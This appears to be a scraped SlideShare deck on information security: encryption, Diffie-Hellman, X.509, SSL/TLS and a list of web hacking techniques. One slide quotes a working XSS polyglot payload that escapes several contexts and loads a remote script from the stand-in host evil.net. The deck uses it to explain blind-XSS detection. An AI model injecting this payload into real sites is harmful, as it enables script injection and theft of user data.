SlideShare a Scribd company logo
1 of 50
Md. Hasan Basri
Full Stack Java SE/EE Developer
pothq@gmail.com
linkedin.com/in/pothiq
One vulnerability is
enough
ReCAP
Network Layer ( ISO Model )
What is Encryption?
➢ It is a process of making data unrecognizable
➢ Unless you have “key” to unlocking the data.
➢ Without the key, it should be imposable or more commonly
unfeasible to read the data in a reasonable timeframe.
Type of Encryption
Security Algorithms
Symmetric Algorithms Asymmetric Algorithms
• DES
• Blowfish
• RC5
• 3DES
• AES
• RSA
• DSA
• Diffie-Hellman
• El Gamal
Understanding
What is Diffie-Hellman?
• A public key algorithm
• Only for key exchange
• Does not encrypt or decrypt
• Based of discrete logarithms
• Widely used in security protocols and commercial products
• Williamson of Britain's CESG claims to have discovered it
several years prior to 1976
Diffie-Hellman Key Exchange
Diffie-Hellman Key Exchange
Example
Diffie-Hellman Key Exchange
Example
Understanding
Brief overview of X.509 certificate
An SSL/TLS X.509 certificate is a digital file that's usable for Secure
Sockets Layer (SSL) or Transport Layer Security (TLS).
Services:
1) An X.509 certificate is a public key + an identity of party +
signed by a certificate authority or self-signed.
2) In other words, X.509 certificate is a digital certificate that uses
X.509 public key infrastructure (PKI) standard to verify that a
public key belongs to the user, computer or service identity.
Verification has been done by CAs.
3) Party uses public key for secure communication, and trust CA to
adequately verify the identities of the party to which it issues
certificates.
** CA = Certification Authority
X.509 Authentication Procedure
X.509 includes three alternative authentication procedure:
1) One-way authentication
2) Two-way authentication
3) Three-way authentication
All use public-key signatures.
Contents of an X.509 certificate
Field Meaning
Version Which version of X.509
Serial
number
This number plus the CA's name uniquely
identifies the certificate
Signature
algorithm
The algorithm used to sign the certificate
Issuer X.500 name of the CA
Validity
period
The starting and ending times of the validity
period
Subject
name
The entity whose key is being certified
Public key The subject's public key and the ID of the
algorithm using it
Issuer ID An optional ID uniquely identifying the
certificate's issuer
Subject ID An optional ID uniquely identifying the
certificate's subject
Extensions Many extensions have been defined
Signature The certificate's signature (signed by the CA's
private key)
What is Certificates?
➢ Digital Certificates are a way of trying to prove that the
security “key” they contain actually belong to the person
they were issued to.
➢ This is done via a trusted third party that both parties in
communication can rely on.
Connection with SSL
SSL
➢ Stands for “Secure Socket Layer”
➢ A cryptographic protocol (A set of agreed rules for coding and
decoding messages so as to keep those messages secure)
➢ Each version was replaced by another version due to security
flaws and now is completely deprecated in June-2015
➢ Its death knell was the block cipher attack used by Poodle
➢ Replaced by...
Summary of SSL Handshake
TLS
➢ “Transport Layer Security”
➢ Like SSL it is cryptographic protocol
➢ The successor to SSL (TLS 1.0 is actually SSL 3.1 but was renamed to
mark the change to an open standard rather than Netscape's protocol)
➢ Currently has 3 versions 1.0, 1.1, 1.2 (1.3 in Draft)
➢ Like SSL it is a constantly changing protocol
Network Layers
Whose are Hackers?
A “Hacker” is a skilled programmer who is
expertise in machine code and operating
systems.
Hackers are categorized into
three main types
• White Hat Hackers
• Gray Hat Hackers
• Black Hat Hackers
Top 10 web hacking
techniques
1. FREAK (Factoring Attack on RSA-Export Keys)
2. LogJam
3. Web Timing Attacks Made Practical
4. Evading All* WAF XSS Filters
5. Abusing CDN’s with SSRF Flash and DNS
6. IllusoryTLS
7. Exploiting XXE in File Parsing Functionality
8. Abusing XLST for Practical Attacks
9. Magic Hashes
10. Hunting Asynchronous Vulnerabilities
FREAK (Factoring Attack on RSA-Export
Keys)
FREAK is a weakness in some implementations
of SSL/TLS that may allow an attacker to
decrypt secure communications
between vulnerable clients
and servers.
Our expected behavior:
FREAK Attack (Man in the
Middle)
FREAK Attack (Man in the
Middle)
Logjam is a security vulnerability against a Diffie–Hellman key
exchange ranging from 512-it (US export-grade) to 1024-bit keys.
Web Timing Attacks Made
Practical1. A Web Timing Attack is a side channel attack in which the
hacker attempts to settle a cryptosystem by analyzing the time
taken to execute cryptographic algorithms.
2. Every logical operation takes some time to get executed, which
can differ based on the input. With precise measurements of
the time for each operation, an attacker can work backward to
the input.
Abusing CDN
Old Hacking Technique
• SQL Injection
• Js Injection
• Session Hijack
• DDoS Penetration
SQL Injection
Js Injection
Session Hijacking
adWare, browser plugins etc.
DDoS Penetration
Nothing is hackproof
but we can make it difficult
• https://medium.com/wordpress-hacked-
help/10-web-hacking-techniques-you-must-
know-about-in-2017-1ff9d78d9669
Abusing XSLT for Practical
Attacks
Security researcher Fernando Arnaboldi illustrated the
different reasons of XSLT Attacks at the Black Hat
conference for the first time. The vulnerability in XSLT
was known for a long time. XSLT converts XML
documents into other XML documents, or other
formats such as HTML for web pages, plain text or XSL.
It may lead to security issues like Denial of Service
Attacks, Cross-Site Attacks etc. It can lead to
threatening the integrity and confidentiality of user
information.
Hunting Asynchronous Vulnerability
There are a number of asynchronous vulnerabilities which are not
visible to a vulnerable client like error messages, async calls etc. Many
asynchronous vulnerabilities are invisible.
That is, there's no way to:
• Trigger error messages
• Cause differences in application output
• Cause detectable time delays
Hunting Asynchronous Vulnerability
Invisible vulnerabilities can be roughly grouped into three types:
• Server-side vulnerabilities in processing that occurs in a background
thread, such as a shell command injection in a nightly cronjob or SQLi
in a queued transaction. Here, a crafted payload might trigger a time
delay, but the delay would only affect a background thread so it
wouldn't be detectable.
• Blind vulnerabilities that are triggered by a secondary event, such as
blind XSS and some second order SQLi. Detection of these issues
using normal techniques is possible but often tricky and error-prone.
• Vulnerabilities where there is no way to cause a difference in
application output, and the technology doesn't support anything that
can be used to cause a reliable time delay. For example, blind XXE or
XPath injection.
Evading All* WAF XSS Filters
As with shell command injection, it's easy to use XSS to trigger a pingback,
but we don't know what the syntax surrounding our input will be - we
might be landing inside a quoted attribute, or a <script> block, etc. We
also don't know which characters may be filtered or encoded.
Gareth Heyes crafted a superb payload to work in most common contexts.
First it breaks out of script context and opens an SVG event handler:
</script><svg/onload=
Then it breaks out of single-quoted attribute, double-quoted attribute,
and single/double quoted JavaScript literal contexts:
'+/"/+/onmouseover=1/
Evading All* WAF XSS Filters
After this point everything is executed as JavaScript, so it's just a matter of
importing an external JavaScript file, and grabbing a stack trace to help
track down the issue afterwards:
+(s=document.createElement(/script/.source),
s.stack=Error().stack,
s.src=(/,/+/evil.net/).slice(2),
document.documentElement.appendChild(s))//’>
Burp Suite will be using this payload as part of its active scanner within the
next few months. If you're impatient, check out the Sleepy Puppy blind
XSS framework recently released by Netflix.
Information Security Engineering
Information Security Engineering

More Related Content

What's hot

Physical access control
Physical access controlPhysical access control
Physical access controlAhsin Yousaf
 
12 security policies
12 security policies12 security policies
12 security policiesSaqib Raza
 
Endpoint Security Solutions
Endpoint Security SolutionsEndpoint Security Solutions
Endpoint Security SolutionsThe TNS Group
 
Digital forensics
Digital forensics Digital forensics
Digital forensics vishnuv43
 
Intrusion prevention system(ips)
Intrusion prevention system(ips)Intrusion prevention system(ips)
Intrusion prevention system(ips)Papun Papun
 
CISSP Chapter 7 - Security Operations
CISSP Chapter 7 - Security OperationsCISSP Chapter 7 - Security Operations
CISSP Chapter 7 - Security OperationsKarthikeyan Dhayalan
 
Traditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation FirewallTraditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation Firewall美兰 曾
 
Types of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsTypes of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsLearningwithRayYT
 
CNIT 121: 8 Forensic Duplication
CNIT 121: 8 Forensic DuplicationCNIT 121: 8 Forensic Duplication
CNIT 121: 8 Forensic DuplicationSam Bowne
 
An overview of access control
An overview of access controlAn overview of access control
An overview of access controlElimity
 
What is zero trust model (ztm)
What is zero trust model (ztm)What is zero trust model (ztm)
What is zero trust model (ztm)Ahmed Banafa
 

What's hot (20)

Access Controls
Access ControlsAccess Controls
Access Controls
 
Mobile Forensics
Mobile ForensicsMobile Forensics
Mobile Forensics
 
Physical access control
Physical access controlPhysical access control
Physical access control
 
12 security policies
12 security policies12 security policies
12 security policies
 
Endpoint Security Solutions
Endpoint Security SolutionsEndpoint Security Solutions
Endpoint Security Solutions
 
Security policies
Security policiesSecurity policies
Security policies
 
Digital forensics
Digital forensics Digital forensics
Digital forensics
 
Intrusion prevention system(ips)
Intrusion prevention system(ips)Intrusion prevention system(ips)
Intrusion prevention system(ips)
 
Chapter 1 Security Framework
Chapter 1   Security FrameworkChapter 1   Security Framework
Chapter 1 Security Framework
 
CISSP Chapter 7 - Security Operations
CISSP Chapter 7 - Security OperationsCISSP Chapter 7 - Security Operations
CISSP Chapter 7 - Security Operations
 
Windows registry forensics
Windows registry forensicsWindows registry forensics
Windows registry forensics
 
Traditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation FirewallTraditional Firewall vs. Next Generation Firewall
Traditional Firewall vs. Next Generation Firewall
 
Types of Threat Actors and Attack Vectors
Types of Threat Actors and Attack VectorsTypes of Threat Actors and Attack Vectors
Types of Threat Actors and Attack Vectors
 
CNIT 121: 8 Forensic Duplication
CNIT 121: 8 Forensic DuplicationCNIT 121: 8 Forensic Duplication
CNIT 121: 8 Forensic Duplication
 
Linux forensics
Linux forensicsLinux forensics
Linux forensics
 
Security engineering
Security engineeringSecurity engineering
Security engineering
 
XXE - XML External Entity Attack
XXE - XML External Entity Attack	XXE - XML External Entity Attack
XXE - XML External Entity Attack
 
An overview of access control
An overview of access controlAn overview of access control
An overview of access control
 
SIEM Primer:
SIEM Primer:SIEM Primer:
SIEM Primer:
 
What is zero trust model (ztm)
What is zero trust model (ztm)What is zero trust model (ztm)
What is zero trust model (ztm)
 

Similar to Information Security Engineering

1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)Gabriella Davis
 
Comparative Analysis of Open-SSL Vulnerabilities & Heartbleed Exploit Detection
Comparative Analysis of Open-SSL Vulnerabilities & Heartbleed Exploit DetectionComparative Analysis of Open-SSL Vulnerabilities & Heartbleed Exploit Detection
Comparative Analysis of Open-SSL Vulnerabilities & Heartbleed Exploit DetectionCSCJournals
 
FS_Usage_Scenarios
FS_Usage_ScenariosFS_Usage_Scenarios
FS_Usage_ScenariosKevin Kao
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionAnant Shrivastava
 
Common crypto attacks and secure implementations
Common crypto attacks and secure implementationsCommon crypto attacks and secure implementations
Common crypto attacks and secure implementationsTrupti Shiralkar, CISSP
 
BCS_PKI_part1.ppt
BCS_PKI_part1.pptBCS_PKI_part1.ppt
BCS_PKI_part1.pptUskuMusku1
 
TLS/SSL - Study of Secured Communications
TLS/SSL - Study of Secured  CommunicationsTLS/SSL - Study of Secured  Communications
TLS/SSL - Study of Secured CommunicationsNitin Ramesh
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
"Mobile security: iOS", Yaroslav Vorontsov, DataArt
"Mobile security: iOS", Yaroslav Vorontsov, DataArt"Mobile security: iOS", Yaroslav Vorontsov, DataArt
"Mobile security: iOS", Yaroslav Vorontsov, DataArtDataArt
 
Comptia Security+ Exam Notes
Comptia Security+ Exam NotesComptia Security+ Exam Notes
Comptia Security+ Exam NotesVijayanand Yadla
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-daysZoltan Balazs
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation SecurityAman Singh
 
Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...
Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...
Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...LogeekNightUkraine
 
Cyber defense for soa & rest oracle
Cyber defense for soa & rest   oracleCyber defense for soa & rest   oracle
Cyber defense for soa & rest oracleigsc
 
Presentation cyber defense for soa & rest
Presentation   cyber defense for soa & restPresentation   cyber defense for soa & rest
Presentation cyber defense for soa & restxKinAnx
 
Layer 7 & Oracle: Cyber Defense for SOA & REST
Layer 7 & Oracle: Cyber Defense for SOA & RESTLayer 7 & Oracle: Cyber Defense for SOA & REST
Layer 7 & Oracle: Cyber Defense for SOA & RESTCA API Management
 
15 intro to ssl certificate &amp; pki concept
15 intro to ssl certificate &amp; pki concept15 intro to ssl certificate &amp; pki concept
15 intro to ssl certificate &amp; pki conceptMostafa El Lathy
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Sean Jackson
 

Similar to Information Security Engineering (20)

1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
1086: The SSL Problem and How to Deploy SHA2 Certificates (with Mark Myers)
 
Comparative Analysis of Open-SSL Vulnerabilities & Heartbleed Exploit Detection
Comparative Analysis of Open-SSL Vulnerabilities & Heartbleed Exploit DetectionComparative Analysis of Open-SSL Vulnerabilities & Heartbleed Exploit Detection
Comparative Analysis of Open-SSL Vulnerabilities & Heartbleed Exploit Detection
 
FS_Usage_Scenarios
FS_Usage_ScenariosFS_Usage_Scenarios
FS_Usage_Scenarios
 
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer ProtectionOwasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
Owasp Mobile Risk Series : M3 : Insufficient Transport Layer Protection
 
FreeBSD and Hardening Web Server
FreeBSD and Hardening Web ServerFreeBSD and Hardening Web Server
FreeBSD and Hardening Web Server
 
Common crypto attacks and secure implementations
Common crypto attacks and secure implementationsCommon crypto attacks and secure implementations
Common crypto attacks and secure implementations
 
BCS_PKI_part1.ppt
BCS_PKI_part1.pptBCS_PKI_part1.ppt
BCS_PKI_part1.ppt
 
TLS/SSL - Study of Secured Communications
TLS/SSL - Study of Secured  CommunicationsTLS/SSL - Study of Secured  Communications
TLS/SSL - Study of Secured Communications
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
"Mobile security: iOS", Yaroslav Vorontsov, DataArt
"Mobile security: iOS", Yaroslav Vorontsov, DataArt"Mobile security: iOS", Yaroslav Vorontsov, DataArt
"Mobile security: iOS", Yaroslav Vorontsov, DataArt
 
Comptia Security+ Exam Notes
Comptia Security+ Exam NotesComptia Security+ Exam Notes
Comptia Security+ Exam Notes
 
ruxc0n 2012
ruxc0n 2012ruxc0n 2012
ruxc0n 2012
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-days
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...
Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...
Dmytro Kochergin - "The OWASP TOP 10 - Typical Attacks on Web Applications an...
 
Cyber defense for soa & rest oracle
Cyber defense for soa & rest   oracleCyber defense for soa & rest   oracle
Cyber defense for soa & rest oracle
 
Presentation cyber defense for soa & rest
Presentation   cyber defense for soa & restPresentation   cyber defense for soa & rest
Presentation cyber defense for soa & rest
 
Layer 7 & Oracle: Cyber Defense for SOA & REST
Layer 7 & Oracle: Cyber Defense for SOA & RESTLayer 7 & Oracle: Cyber Defense for SOA & REST
Layer 7 & Oracle: Cyber Defense for SOA & REST
 
15 intro to ssl certificate &amp; pki concept
15 intro to ssl certificate &amp; pki concept15 intro to ssl certificate &amp; pki concept
15 intro to ssl certificate &amp; pki concept
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
 

More from Md. Hasan Basri (Angel)

More from Md. Hasan Basri (Angel) (9)

Introduction to Apache Hadoop Eco-System
Introduction to Apache Hadoop Eco-SystemIntroduction to Apache Hadoop Eco-System
Introduction to Apache Hadoop Eco-System
 
Introduction to Blockchain Technology
Introduction to Blockchain TechnologyIntroduction to Blockchain Technology
Introduction to Blockchain Technology
 
MicroService Architecture
MicroService ArchitectureMicroService Architecture
MicroService Architecture
 
Test Driven Development
Test Driven DevelopmentTest Driven Development
Test Driven Development
 
Introduction to Bank Reconciliation
Introduction to Bank ReconciliationIntroduction to Bank Reconciliation
Introduction to Bank Reconciliation
 
Agile/Scrum Methodology Gains Your Productivity
Agile/Scrum Methodology Gains Your ProductivityAgile/Scrum Methodology Gains Your Productivity
Agile/Scrum Methodology Gains Your Productivity
 
ISO 8583 Financial Message Format
ISO 8583 Financial Message FormatISO 8583 Financial Message Format
ISO 8583 Financial Message Format
 
Signature based virus detection and protection system
Signature based virus detection and protection systemSignature based virus detection and protection system
Signature based virus detection and protection system
 
XML Key Management Protocol for Secure Web Service
XML Key Management Protocol for Secure Web ServiceXML Key Management Protocol for Secure Web Service
XML Key Management Protocol for Secure Web Service
 

Recently uploaded

VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnAmarnathKambale
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplatePresentation.STUDIO
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfAzure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfryanfarris8
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerThousandEyes
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsJhone kinadey
 
How to Choose the Right Laravel Development Partner in New York City_compress...
How to Choose the Right Laravel Development Partner in New York City_compress...How to Choose the Right Laravel Development Partner in New York City_compress...
How to Choose the Right Laravel Development Partner in New York City_compress...software pro Development
 
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...kalichargn70th171
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsAndolasoft Inc
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesVictorSzoltysek
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdfWave PLM
 
Define the academic and professional writing..pdf
Define the academic and professional writing..pdfDefine the academic and professional writing..pdf
Define the academic and professional writing..pdfPearlKirahMaeRagusta1
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...Health
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidPhilip Schwarz
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 

Recently uploaded (20)

VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdfAzure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
Azure_Native_Qumulo_High_Performance_Compute_Benchmarks.pdf
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
How to Choose the Right Laravel Development Partner in New York City_compress...
How to Choose the Right Laravel Development Partner in New York City_compress...How to Choose the Right Laravel Development Partner in New York City_compress...
How to Choose the Right Laravel Development Partner in New York City_compress...
 
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
 
5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf5 Signs You Need a Fashion PLM Software.pdf
5 Signs You Need a Fashion PLM Software.pdf
 
Define the academic and professional writing..pdf
Define the academic and professional writing..pdfDefine the academic and professional writing..pdf
Define the academic and professional writing..pdf
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS LiveVip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
Vip Call Girls Noida ➡️ Delhi ➡️ 9999965857 No Advance 24HRS Live
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems -The Print[A] Example- A Comprehension AidDirect Style Effect Systems -The Print[A] Example- A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 

Information Security Engineering

  • 1.
  • 2. Md. Hasan Basri Full Stack Java SE/EE Developer pothq@gmail.com linkedin.com/in/pothiq
  • 5. Network Layer ( ISO Model )
  • 6. What is Encryption? ➢ It is a process of making data unrecognizable ➢ Unless you have “key” to unlocking the data. ➢ Without the key, it should be imposable or more commonly unfeasible to read the data in a reasonable timeframe.
  • 7. Type of Encryption Security Algorithms Symmetric Algorithms Asymmetric Algorithms • DES • Blowfish • RC5 • 3DES • AES • RSA • DSA • Diffie-Hellman • El Gamal
  • 9. What is Diffie-Hellman? • A public key algorithm • Only for key exchange • Does not encrypt or decrypt • Based of discrete logarithms • Widely used in security protocols and commercial products • Williamson of Britain's CESG claims to have discovered it several years prior to 1976
  • 14. Brief overview of X.509 certificate An SSL/TLS X.509 certificate is a digital file that's usable for Secure Sockets Layer (SSL) or Transport Layer Security (TLS). Services: 1) An X.509 certificate is a public key + an identity of party + signed by a certificate authority or self-signed. 2) In other words, X.509 certificate is a digital certificate that uses X.509 public key infrastructure (PKI) standard to verify that a public key belongs to the user, computer or service identity. Verification has been done by CAs. 3) Party uses public key for secure communication, and trust CA to adequately verify the identities of the party to which it issues certificates. ** CA = Certification Authority
  • 15. X.509 Authentication Procedure X.509 includes three alternative authentication procedure: 1) One-way authentication 2) Two-way authentication 3) Three-way authentication All use public-key signatures.
  • 16. Contents of an X.509 certificate Field Meaning Version Which version of X.509 Serial number This number plus the CA's name uniquely identifies the certificate Signature algorithm The algorithm used to sign the certificate Issuer X.500 name of the CA Validity period The starting and ending times of the validity period Subject name The entity whose key is being certified Public key The subject's public key and the ID of the algorithm using it Issuer ID An optional ID uniquely identifying the certificate's issuer Subject ID An optional ID uniquely identifying the certificate's subject Extensions Many extensions have been defined Signature The certificate's signature (signed by the CA's private key)
  • 17. What is Certificates? ➢ Digital Certificates are a way of trying to prove that the security “key” they contain actually belong to the person they were issued to. ➢ This is done via a trusted third party that both parties in communication can rely on.
  • 19. SSL ➢ Stands for “Secure Socket Layer” ➢ A cryptographic protocol (A set of agreed rules for coding and decoding messages so as to keep those messages secure) ➢ Each version was replaced by another version due to security flaws and now is completely deprecated in June-2015 ➢ Its death knell was the block cipher attack used by Poodle ➢ Replaced by...
  • 20. Summary of SSL Handshake
